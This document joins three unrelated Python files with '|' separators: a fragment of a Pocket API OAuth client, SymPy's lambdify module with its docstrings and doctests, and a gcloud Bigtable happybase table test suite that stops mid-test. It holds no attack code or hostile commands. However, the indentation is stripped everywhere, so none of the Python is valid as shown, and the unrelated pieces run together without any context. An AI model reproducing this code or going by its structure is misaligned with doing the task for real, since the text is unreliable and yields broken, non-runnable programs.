def commit(self):
'''
This method executes the bulk query, flushes stored queries and
returns the response
'''
url = self.api_endpoints['send']
payload = {
'actions': self._bulk_query,
}
payload.update(self._payload)
self._bulk_query = []
return self._make_request(
url,
json.dumps(payload),
headers={'content-type': 'application/json'},
)
@classmethod
def get_request_token(
cls, consumer_key, redirect_uri='http://example.com/', state=None
):
'''
Returns the request token that can be used to fetch the access token
'''
headers = {
'X-Accept': 'application/json',
}
url = 'https://getpocket.com/v3/oauth/request'
payload = {
'consumer_key': consumer_key,
'redirect_uri': redirect_uri,
}
if state:
payload['state'] = state
return cls._make_request(url, payload, headers)[0]['code']
@classmethod
def get_credentials(cls, consumer_key, code):
'''
Fetches access token from using the request token and consumer key
'''
headers = {
'X-Accept': 'application/json',
}
url = 'https://getpocket.com/v3/oauth/authorize'
payload = {
'consumer_key': consumer_key,
'code': code,
}
return cls._make_request(url, payload, headers)[0]
@classmethod
def get_access_token(cls, consumer_key, code):
return cls.get_credentials(consumer_key, code)['access_token']
@classmethod
def get_auth_url(cls, code, redirect_uri='http://example.com'):
auth_url = ('https://getpocket.com/auth/authorize'
'?request_token=%s&redirect_uri=%s' % (code, redirect_uri))
return auth_url
@classmethod
def auth(
cls, consumer_key, redirect_uri='http://example.com/', state=None,
):
'''
This is a test method for verifying if oauth worked
http://getpocket.com/developer/docs/authentication
'''
code = cls.get_request_token(consumer_key, redirect_uri, state)
auth_url = 'https://getpocket.com/auth/authorize?request_token='\
'%s&redirect_uri=%s' % (code, redirect_uri)
raw_input(
'Please open %s in your browser to authorize the app and '
'press enter:' % auth_url
)
return cls.get_access_token(consumer_key, code)
|
|
"""
This module provides convenient functions to transform sympy expressions to
lambda functions which can be used to calculate numerical values very fast.
"""
from __future__ import print_function, division
import inspect
import textwrap
from sympy.external import import_module
from sympy.core.compatibility import exec_, is_sequence, iterable, string_types, range, builtins
from sympy.utilities.decorator import doctest_depends_on
# These are the namespaces the lambda functions will use.
MATH = {}
MPMATH = {}
NUMPY = {}
SYMPY = {}
NUMEXPR = {}
# Default namespaces, letting us define translations that can't be defined
# by simple variable maps, like I => 1j
# These are separate from the names above because the above names are modified
# throughout this file, whereas these should remain unmodified.
MATH_DEFAULT = {}
MPMATH_DEFAULT = {}
NUMPY_DEFAULT = {"I": 1j}
SYMPY_DEFAULT = {}
NUMEXPR_DEFAULT = {}
# Mappings between sympy and other modules function names.
MATH_TRANSLATIONS = {
"Abs": "fabs",
"ceiling": "ceil",
"E": "e",
"ln": "log",
}
MPMATH_TRANSLATIONS = {
"Abs": "fabs",
"elliptic_k": "ellipk",
"elliptic_f": "ellipf",
"elliptic_e": "ellipe",
"elliptic_pi": "ellippi",
"ceiling": "ceil",
"chebyshevt": "chebyt",
"chebyshevu": "chebyu",
"E": "e",
"I": "j",
"ln": "log",
#"lowergamma":"lower_gamma",
"oo": "inf",
#"uppergamma":"upper_gamma",
"LambertW": "lambertw",
"MutableDenseMatrix": "matrix",
"ImmutableMatrix": "matrix",
"conjugate": "conj",
"dirichlet_eta": "altzeta",
"Ei": "ei",
"Shi": "shi",
"Chi": "chi",
"Si": "si",
"Ci": "ci"
}
NUMPY_TRANSLATIONS = {
"Abs": "abs",
"acos": "arccos",
"acosh": "arccosh",
"arg": "angle",
"asin": "arcsin",
"asinh": "arcsinh",
"atan": "arctan",
"atan2": "arctan2",
"atanh": "arctanh",
"ceiling": "ceil",
"E": "e",
"im": "imag",
"ln": "log",
"Mod": "mod",
"oo": "inf",
"re": "real",
"SparseMatrix": "array",
"ImmutableSparseMatrix": "array",
"Matrix": "array",
"MutableDenseMatrix": "array",
"ImmutableMatrix": "array",
"ImmutableDenseMatrix": "array",
}
NUMEXPR_TRANSLATIONS = {}
# Available modules:
MODULES = {
"math": (MATH, MATH_DEFAULT, MATH_TRANSLATIONS, ("from math import *",)),
"mpmath": (MPMATH, MPMATH_DEFAULT, MPMATH_TRANSLATIONS, ("from mpmath import *",)),
"numpy": (NUMPY, NUMPY_DEFAULT, NUMPY_TRANSLATIONS, ("import_module('numpy')",)),
"sympy": (SYMPY, SYMPY_DEFAULT, {}, (
"from sympy.functions import *",
"from sympy.matrices import *",
"from sympy import Integral, pi, oo, nan, zoo, E, I",)),
"numexpr" : (NUMEXPR, NUMEXPR_DEFAULT, NUMEXPR_TRANSLATIONS,
("import_module('numexpr')", )),
}
def _import(module, reload="False"):
"""
Creates a global translation dictionary for module.
The argument module has to be one of the following strings: "math",
"mpmath", "numpy", "sympy".
These dictionaries map names of python functions to their equivalent in
other modules.
"""
try:
namespace, namespace_default, translations, import_commands = MODULES[
module]
except KeyError:
raise NameError(
"'%s' module can't be used for lambdification" % module)
# Clear namespace or exit
if namespace != namespace_default:
# The namespace was already generated, don't do it again if not forced.
if reload:
namespace.clear()
namespace.update(namespace_default)
else:
return
for import_command in import_commands:
if import_command.startswith('import_module'):
module = eval(import_command)
if module is not None:
namespace.update(module.__dict__)
continue
else:
try:
exec_(import_command, {}, namespace)
continue
except ImportError:
pass
raise ImportError(
"can't import '%s' with '%s' command" % (module, import_command))
# Add translated names to namespace
for sympyname, translation in translations.items():
namespace[sympyname] = namespace[translation]
@doctest_depends_on(modules=('numpy'))
def lambdify(args, expr, modules=None, printer=None, use_imps=True,
dummify=True):
"""
Returns a lambda function for fast calculation of numerical values.
If not specified differently by the user, SymPy functions are replaced as
far as possible by either python-math, numpy (if available) or mpmath
functions - exactly in this order. To change this behavior, the "modules"
argument can be used. It accepts:
- the strings "math", "mpmath", "numpy", "numexpr", "sympy"
- any modules (e.g. math)
- dictionaries that map names of sympy functions to arbitrary functions
- lists that contain a mix of the arguments above, with higher priority
given to entries appearing first.
The default behavior is to substitute all arguments in the provided
expression with dummy symbols. This allows for applied functions (e.g.
f(t)) to be supplied as arguments. Call the function with dummify=False if
dummy substitution is unwanted (and `args` is not a string). If you want
to view the lambdified function or provide "sympy" as the module, you
should probably set dummify=False.
For functions involving large array calculations, numexpr can provide a
significant speedup over numpy. Please note that the available functions
for numexpr are more limited than numpy but can be expanded with
implemented_function and user defined subclasses of Function. If specified,
numexpr may be the only option in modules. The official list of numexpr
functions can be found at:
https://github.com/pydata/numexpr#supported-functions
In previous releases ``lambdify`` replaced ``Matrix`` with ``numpy.matrix``
by default. As of release 0.7.7 ``numpy.array`` is the default.
To get the old default behavior you must pass in ``[{'ImmutableMatrix':
numpy.matrix}, 'numpy']`` to the ``modules`` kwarg.
>>> from sympy import lambdify, Matrix
>>> from sympy.abc import x, y
>>> import numpy
>>> array2mat = [{'ImmutableMatrix': numpy.matrix}, 'numpy']
>>> f = lambdify((x, y), Matrix([x, y]), modules=array2mat)
>>> f(1, 2)
matrix([[1],
[2]])
Usage
=====
(1) Use one of the provided modules:
>>> from sympy import sin, tan, gamma
>>> from sympy.utilities.lambdify import lambdastr
>>> from sympy.abc import x, y
>>> f = lambdify(x, sin(x), "math")
Attention: Functions that are not in the math module will throw a name
error when the lambda function is evaluated! So this would
be better:
>>> f = lambdify(x, sin(x)*gamma(x), ("math", "mpmath", "sympy"))
(2) Use some other module:
>>> import numpy
>>> f = lambdify((x,y), tan(x*y), numpy)
Attention: There are naming differences between numpy and sympy. So if
you simply take the numpy module, e.g. sympy.atan will not be
translated to numpy.arctan. Use the modified module instead
by passing the string "numpy":
>>> f = lambdify((x,y), tan(x*y), "numpy")
>>> f(1, 2)
-2.18503986326
>>> from numpy import array
>>> f(array([1, 2, 3]), array([2, 3, 5]))
[-2.18503986 -0.29100619 -0.8559934 ]
(3) Use a dictionary defining custom functions:
>>> def my_cool_function(x): return 'sin(%s) is cool' % x
>>> myfuncs = {"sin" : my_cool_function}
>>> f = lambdify(x, sin(x), myfuncs); f(1)
'sin(1) is cool'
Examples
========
>>> from sympy.utilities.lambdify import implemented_function
>>> from sympy import sqrt, sin, Matrix
>>> from sympy import Function
>>> from sympy.abc import w, x, y, z
>>> f = lambdify(x, x**2)
>>> f(2)
4
>>> f = lambdify((x, y, z), [z, y, x])
>>> f(1,2,3)
[3, 2, 1]
>>> f = lambdify(x, sqrt(x))
>>> f(4)
2.0
>>> f = lambdify((x, y), sin(x*y)**2)
>>> f(0, 5)
0.0
>>> row = lambdify((x, y), Matrix((x, x + y)).T, modules='sympy')
>>> row(1, 2)
Matrix([[1, 3]])
Tuple arguments are handled and the lambdified function should
be called with the same type of arguments as were used to create
the function.:
>>> f = lambdify((x, (y, z)), x + y)
>>> f(1, (2, 4))
3
A more robust way of handling this is to always work with flattened
arguments:
>>> from sympy.utilities.iterables import flatten
>>> args = w, (x, (y, z))
>>> vals = 1, (2, (3, 4))
>>> f = lambdify(flatten(args), w + x + y + z)
>>> f(*flatten(vals))
10
Functions present in `expr` can also carry their own numerical
implementations, in a callable attached to the ``_imp_``
attribute. Usually you attach this using the
``implemented_function`` factory:
>>> f = implemented_function(Function('f'), lambda x: x+1)
>>> func = lambdify(x, f(x))
>>> func(4)
5
``lambdify`` always prefers ``_imp_`` implementations to implementations
in other namespaces, unless the ``use_imps`` input parameter is False.
"""
from sympy.core.symbol import Symbol
from sympy.utilities.iterables import flatten
# If the user hasn't specified any modules, use what is available.
module_provided = True
if modules is None:
module_provided = False
# Use either numpy (if available) or python.math where possible.
# XXX: This leads to different behaviour on different systems and
# might be the reason for irreproducible errors.
modules = ["math", "mpmath", "sympy"]
#Attempt to import numpy
try:
_import("numpy")
except ImportError:
pass
else:
modules.insert(1, "numpy")
# Get the needed namespaces.
namespaces = []
# First find any function implementations
if use_imps:
namespaces.append(_imp_namespace(expr))
# Check for dict before iterating
if isinstance(modules, (dict, str)) or not hasattr(modules, '__iter__'):
namespaces.append(modules)
else:
# consistency check
if _module_present('numexpr', modules) and len(modules) > 1:
raise TypeError("numexpr must be the only item in 'modules'")
namespaces += list(modules)
# fill namespace with first having highest priority
namespace = {}
for m in namespaces[::-1]:
buf = _get_namespace(m)
namespace.update(buf)
if hasattr(expr, "atoms"):
#Try if you can extract symbols from the expression.
#Move on if expr.atoms in not implemented.
syms = expr.atoms(Symbol)
for term in syms:
namespace.update({str(term): term})
if _module_present('numpy',namespaces) and printer is None:
#XXX: This has to be done here because of circular imports
from sympy.printing.lambdarepr import NumPyPrinter as printer
if _module_present('numexpr',namespaces) and printer is None:
#XXX: This has to be done here because of circular imports
from sympy.printing.lambdarepr import NumExprPrinter as printer
# Get the names of the args, for creating a docstring
if not iterable(args):
args = (args,)
names = []
# Grab the callers frame, for getting the names by inspection (if needed)
callers_local_vars = inspect.currentframe().f_back.f_locals.items()
for n, var in enumerate(args):
if hasattr(var, 'name'):
names.append(var.name)
else:
# It's an iterable. Try to get name by inspection of calling frame.
name_list = [var_name for var_name, var_val in callers_local_vars
if var_val is var]
if len(name_list) == 1:
names.append(name_list[0])
else:
# Cannot infer name with certainty. arg_# will have to do.
names.append('arg_' + str(n))
# Create lambda function.
lstr = lambdastr(args, expr, printer=printer, dummify=dummify)
flat = '__flatten_args__'
if flat in lstr:
namespace.update({flat: flatten})
# Provide lambda expression with builtins, and compatible implementation of range
namespace.update({'builtins':builtins, 'range':range})
func = eval(lstr, namespace)
# Apply the docstring
sig = "func({0})".format(", ".join(str(i) for i in names))
sig = textwrap.fill(sig, subsequent_indent=' '*8)
expr_str = str(expr)
if len(expr_str) > 78:
expr_str = textwrap.wrap(expr_str, 75)[0] + '...'
func.__doc__ = ("Created with lambdify. Signature:\n\n{sig}\n\n"
"Expression:\n\n{expr}").format(sig=sig, expr=expr_str)
return func
def _module_present(modname, modlist):
if modname in modlist:
return True
for m in modlist:
if hasattr(m, '__name__') and m.__name__ == modname:
return True
return False
def _get_namespace(m):
"""
This is used by _lambdify to parse its arguments.
"""
if isinstance(m, str):
_import(m)
return MODULES[m][0]
elif isinstance(m, dict):
return m
elif hasattr(m, "__dict__"):
return m.__dict__
else:
raise TypeError("Argument must be either a string, dict or module but it is: %s" % m)
def lambdastr(args, expr, printer=None, dummify=False):
"""
Returns a string that can be evaluated to a lambda function.
Examples
========
>>> from sympy.abc import x, y, z
>>> from sympy.utilities.lambdify import lambdastr
>>> lambdastr(x, x**2)
'lambda x: (x**2)'
>>> lambdastr((x,y,z), [z,y,x])
'lambda x,y,z: ([z, y, x])'
Although tuples may not appear as arguments to lambda in Python 3,
lambdastr will create a lambda function that will unpack the original
arguments so that nested arguments can be handled:
>>> lambdastr((x, (y, z)), x + y)
'lambda _0,_1: (lambda x,y,z: (x + y))(*list(__flatten_args__([_0,_1])))'
"""
# Transforming everything to strings.
from sympy.matrices import DeferredVector
from sympy import Dummy, sympify, Symbol, Function, flatten
if printer is not None:
if inspect.isfunction(printer):
lambdarepr = printer
else:
if inspect.isclass(printer):
lambdarepr = lambda expr: printer().doprint(expr)
else:
lambdarepr = lambda expr: printer.doprint(expr)
else:
#XXX: This has to be done here because of circular imports
from sympy.printing.lambdarepr import lambdarepr
def sub_args(args, dummies_dict):
if isinstance(args, str):
return args
elif isinstance(args, DeferredVector):
return str(args)
elif iterable(args):
dummies = flatten([sub_args(a, dummies_dict) for a in args])
return ",".join(str(a) for a in dummies)
else:
#Sub in dummy variables for functions or symbols
if isinstance(args, (Function, Symbol)):
dummies = Dummy()
dummies_dict.update({args : dummies})
return str(dummies)
else:
return str(args)
def sub_expr(expr, dummies_dict):
try:
expr = sympify(expr).xreplace(dummies_dict)
except Exception:
if isinstance(expr, DeferredVector):
pass
elif isinstance(expr, dict):
k = [sub_expr(sympify(a), dummies_dict) for a in expr.keys()]
v = [sub_expr(sympify(a), dummies_dict) for a in expr.values()]
expr = dict(zip(k, v))
elif isinstance(expr, tuple):
expr = tuple(sub_expr(sympify(a), dummies_dict) for a in expr)
elif isinstance(expr, list):
expr = [sub_expr(sympify(a), dummies_dict) for a in expr]
return expr
# Transform args
def isiter(l):
return iterable(l, exclude=(str, DeferredVector))
if isiter(args) and any(isiter(i) for i in args):
from sympy.utilities.iterables import flatten
import re
dum_args = [str(Dummy(str(i))) for i in range(len(args))]
iter_args = ','.join([i if isiter(a) else i
for i, a in zip(dum_args, args)])
lstr = lambdastr(flatten(args), expr, printer=printer, dummify=dummify)
flat = '__flatten_args__'
rv = 'lambda %s: (%s)(*list(%s([%s])))' % (
','.join(dum_args), lstr, flat, iter_args)
if len(re.findall(r'\b%s\b' % flat, rv)) > 1:
raise ValueError('the name %s is reserved by lambdastr' % flat)
return rv
dummies_dict = {}
if dummify:
args = sub_args(args, dummies_dict)
else:
if isinstance(args, str):
pass
elif iterable(args, exclude=DeferredVector):
args = ",".join(str(a) for a in args)
# Transform expr
if dummify:
if isinstance(expr, str):
pass
else:
expr = sub_expr(expr, dummies_dict)
expr = lambdarepr(expr)
return "lambda %s: (%s)" % (args, expr)
def _imp_namespace(expr, namespace=None):
""" Return namespace dict with function implementations
We need to search for functions in anything that can be thrown at
us - that is - anything that could be passed as `expr`. Examples
include sympy expressions, as well as tuples, lists and dicts that may
contain sympy expressions.
Parameters
----------
expr : object
Something passed to lambdify, that will generate valid code from
``str(expr)``.
namespace : None or mapping
Namespace to fill. None results in new empty dict
Returns
-------
namespace : dict
dict with keys of implemented function names within `expr` and
corresponding values being the numerical implementation of
function
Examples
========
>>> from sympy.abc import x
>>> from sympy.utilities.lambdify import implemented_function, _imp_namespace
>>> from sympy import Function
>>> f = implemented_function(Function('f'), lambda x: x+1)
>>> g = implemented_function(Function('g'), lambda x: x*10)
>>> namespace = _imp_namespace(f(g(x)))
>>> sorted(namespace.keys())
['f', 'g']
"""
# Delayed import to avoid circular imports
from sympy.core.function import FunctionClass
if namespace is None:
namespace = {}
# tuples, lists, dicts are valid expressions
if is_sequence(expr):
for arg in expr:
_imp_namespace(arg, namespace)
return namespace
elif isinstance(expr, dict):
for key, val in expr.items():
# functions can be in dictionary keys
_imp_namespace(key, namespace)
_imp_namespace(val, namespace)
return namespace
# sympy expressions may be Functions themselves
func = getattr(expr, 'func', None)
if isinstance(func, FunctionClass):
imp = getattr(func, '_imp_', None)
if imp is not None:
name = expr.func.__name__
if name in namespace and namespace[name] != imp:
raise ValueError('We found more than one '
'implementation with name '
'"%s"' % name)
namespace[name] = imp
# and / or they may take Functions as arguments
if hasattr(expr, 'args'):
for arg in expr.args:
_imp_namespace(arg, namespace)
return namespace
def implemented_function(symfunc, implementation):
""" Add numerical ``implementation`` to function ``symfunc``.
``symfunc`` can be an ``UndefinedFunction`` instance, or a name string.
In the latter case we create an ``UndefinedFunction`` instance with that
name.
Be aware that this is a quick workaround, not a general method to create
special symbolic functions. If you want to create a symbolic function to be
used by all the machinery of SymPy you should subclass the ``Function``
class.
Parameters
----------
symfunc : ``str`` or ``UndefinedFunction`` instance
If ``str``, then create new ``UndefinedFunction`` with this as
name. If `symfunc` is a sympy function, attach implementation to it.
implementation : callable
numerical implementation to be called by ``evalf()`` or ``lambdify``
Returns
-------
afunc : sympy.FunctionClass instance
function with attached implementation
Examples
========
>>> from sympy.abc import x
>>> from sympy.utilities.lambdify import lambdify, implemented_function
>>> from sympy import Function
>>> f = implemented_function(Function('f'), lambda x: x+1)
>>> lam_f = lambdify(x, f(x))
>>> lam_f(4)
5
"""
# Delayed import to avoid circular imports
from sympy.core.function import UndefinedFunction
# if name, create function to hold implementation
if isinstance(symfunc, string_types):
symfunc = UndefinedFunction(symfunc)
elif not isinstance(symfunc, UndefinedFunction):
raise ValueError('symfunc should be either a string or'
' an UndefinedFunction instance.')
# We need to attach as a method because symfunc will be a class
symfunc._imp_ = staticmethod(implementation)
return symfunc
|
|
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class Test_make_row(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import make_row
return make_row(*args, **kwargs)
def test_it(self):
with self.assertRaises(NotImplementedError):
self._callFUT({}, False)
class Test_make_ordered_row(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import make_ordered_row
return make_ordered_row(*args, **kwargs)
def test_it(self):
with self.assertRaises(NotImplementedError):
self._callFUT([], False)
class TestTable(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.happybase.table import Table
return Table
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
instance = object()
connection = _Connection(instance)
tables_constructed = []
def make_low_level_table(*args, **kwargs):
result = _MockLowLevelTable(*args, **kwargs)
tables_constructed.append(result)
return result
with _Monkey(MUT, _LowLevelTable=make_low_level_table):
table = self._makeOne(name, connection)
self.assertEqual(table.name, name)
self.assertEqual(table.connection, connection)
table_instance, = tables_constructed
self.assertEqual(table._low_level_table, table_instance)
self.assertEqual(table_instance.args, (name, instance))
self.assertEqual(table_instance.kwargs, {})
def test_constructor_null_connection(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
self.assertEqual(table.name, name)
self.assertEqual(table.connection, connection)
self.assertEqual(table._low_level_table, None)
def test_families(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
# Mock the column families to be returned.
col_fam_name = 'fam'
gc_rule = object()
col_fam = _MockLowLevelColumnFamily(col_fam_name, gc_rule=gc_rule)
col_fams = {col_fam_name: col_fam}
table._low_level_table.column_families = col_fams
to_dict_result = object()
to_dict_calls = []
def mock_gc_rule_to_dict(gc_rule):
to_dict_calls.append(gc_rule)
return to_dict_result
with _Monkey(MUT, _gc_rule_to_dict=mock_gc_rule_to_dict):
result = table.families()
self.assertEqual(result, {col_fam_name: to_dict_result})
self.assertEqual(table._low_level_table.list_column_families_calls, 1)
self.assertEqual(to_dict_calls, [gc_rule])
def test___repr__(self):
name = 'table-name'
table = self._makeOne(name, None)
self.assertEqual(repr(table), '<table.Table name=\'table-name\'>')
def test_regions(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
with self.assertRaises(NotImplementedError):
table.regions()
def test_row_empty_row(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
table._low_level_table.read_row_result = None
# Set-up mocks.
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
row_key = 'row-key'
timestamp = object()
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper):
result = table.row(row_key, timestamp=timestamp)
# read_row_result == None --> No results.
self.assertEqual(result, {})
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
expected_kwargs = {
'filters': [],
'versions': 1,
'timestamp': timestamp,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_row_with_columns(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
table._low_level_table.read_row_result = None
# Set-up mocks.
fake_col_filter = object()
mock_columns = []
def mock_columns_filter_helper(*args):
mock_columns.append(args)
return fake_col_filter
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
row_key = 'row-key'
columns = object()
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_columns_filter_helper=mock_columns_filter_helper):
result = table.row(row_key, columns=columns)
# read_row_result == None --> No results.
self.assertEqual(result, {})
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
self.assertEqual(mock_columns, [(columns,)])
expected_kwargs = {
'filters': [fake_col_filter],
'versions': 1,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_row_with_results(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.row_data import PartialRowData
row_key = 'row-key'
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
partial_row = PartialRowData(row_key)
table._low_level_table.read_row_result = partial_row
# Set-up mocks.
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
fake_pair = object()
mock_cells = []
def mock_cells_to_pairs(*args, **kwargs):
mock_cells.append((args, kwargs))
return [fake_pair]
col_fam = u'cf1'
qual = b'qual'
fake_cells = object()
partial_row._cells = {col_fam: {qual: fake_cells}}
include_timestamp = object()
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_cells_to_pairs=mock_cells_to_pairs):
result = table.row(row_key, include_timestamp=include_timestamp)
# The results come from _cells_to_pairs.
expected_result = {col_fam.encode('ascii') + b':' + qual: fake_pair}
self.assertEqual(result, expected_result)
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
expected_kwargs = {
'filters': [],
'versions': 1,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
to_pairs_kwargs = {'include_timestamp': include_timestamp}
self.assertEqual(mock_cells,
[((fake_cells,), to_pairs_kwargs)])
def test_rows_empty_row(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
result = table.rows([])
self.assertEqual(result, [])
def test_rows_with_columns(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
rr_result = _MockPartialRowsData()
table._low_level_table.read_rows_result = rr_result
self.assertEqual(rr_result.consume_all_calls, 0)
# Set-up mocks.
fake_col_filter = object()
mock_cols = []
def mock_columns_filter_helper(*args):
mock_cols.append(args)
return fake_col_filter
fake_rows_filter = object()
mock_rows = []
def mock_row_keys_filter_helper(*args):
mock_rows.append(args)
return fake_rows_filter
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
rows = ['row-key']
columns = object()
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_row_keys_filter_helper=mock_row_keys_filter_helper,
_columns_filter_helper=mock_columns_filter_helper):
result = table.rows(rows, columns=columns)
# read_rows_result == Empty PartialRowsData --> No results.
self.assertEqual(result, [])
read_rows_args = ()
read_rows_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_rows_calls, [
(read_rows_args, read_rows_kwargs),
])
self.assertEqual(rr_result.consume_all_calls, 1)
self.assertEqual(mock_cols, [(columns,)])
self.assertEqual(mock_rows, [(rows,)])
expected_kwargs = {
'filters': [fake_col_filter, fake_rows_filter],
'versions': 1,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_rows_with_results(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.row_data import PartialRowData
row_key1 = 'row-key1'
row_key2 = 'row-key2'
rows = [row_key1, row_key2]
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
row1 = PartialRowData(row_key1)
# Return row1 but not row2
rr_result = _MockPartialRowsData(rows={row_key1: row1})
table._low_level_table.read_rows_result = rr_result
self.assertEqual(rr_result.consume_all_calls, 0)
# Set-up mocks.
fake_rows_filter = object()
mock_rows = []
def mock_row_keys_filter_helper(*args):
mock_rows.append(args)
return fake_rows_filter
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
fake_pair = object()
mock_cells = []
def mock_cells_to_pairs(*args, **kwargs):
mock_cells.append((args, kwargs))
return [fake_pair]
col_fam = u'cf1'
qual = b'qual'
fake_cells = object()
row1._cells = {col_fam: {qual: fake_cells}}
include_timestamp = object()
with _Monkey(MUT, _row_keys_filter_helper=mock_row_keys_filter_helper,
_filter_chain_helper=mock_filter_chain_helper,
_cells_to_pairs=mock_cells_to_pairs):
result = table.rows(rows, include_timestamp=include_timestamp)
# read_rows_result == PartialRowsData with row_key1
expected_result = {col_fam.encode('ascii') + b':' + qual: fake_pair}
self.assertEqual(result, [(row_key1, expected_result)])
read_rows_args = ()
read_rows_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_rows_calls, [
(read_rows_args, read_rows_kwargs),
])
self.assertEqual(rr_result.consume_all_calls, 1)
self.assertEqual(mock_rows, [(rows,)])
expected_kwargs = {
'filters': [fake_rows_filter],
'versions': 1,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
to_pairs_kwargs = {'include_timestamp': include_timestamp}
self.assertEqual(mock_cells,
[((fake_cells,), to_pairs_kwargs)])
def test_cells_empty_row(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
table._low_level_table.read_row_result = None
# Set-up mocks.
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
row_key = 'row-key'
column = 'fam:col1'
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper):
result = table.cells(row_key, column)
# read_row_result == None --> No results.
self.assertEqual(result, [])
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
expected_kwargs = {
'column': column,
'versions': None,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_cells_with_results(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.row_data import PartialRowData
row_key = 'row-key'
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
partial_row = PartialRowData(row_key)
table._low_level_table.read_row_result = partial_row
# These are all passed to mocks.
versions = object()
timestamp = object()
include_timestamp = object()
# Set-up mocks.
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
fake_result = object()
mock_cells = []
def mock_cells_to_pairs(*args, **kwargs):
mock_cells.append((args, kwargs))
return fake_result
col_fam = 'cf1'
qual = 'qual'
fake_cells = object()
partial_row._cells = {col_fam: {qual: fake_cells}}
column = col_fam + ':' + qual
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_cells_to_pairs=mock_cells_to_pairs):
result = table.cells(row_key, column, versions=versions,
timestamp=timestamp,
include_timestamp=include_timestamp)
self.assertEqual(result, fake_result)
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
filter_kwargs = {
'column': column,
'versions': versions,
'timestamp': timestamp,
}
self.assertEqual(mock_filters, [filter_kwargs])
to_pairs_kwargs = {'include_timestamp': include_timestamp}
self.assertEqual(mock_cells,
[((fake_cells,), to_pairs_kwargs)])
def test_scan_with_batch_size(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
warned = []
def mock_warn(msg):
warned.append(msg)
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
# Use unknown to force a TypeError, so we don't need to
# stub out the rest of the method.
with self.assertRaises(TypeError):
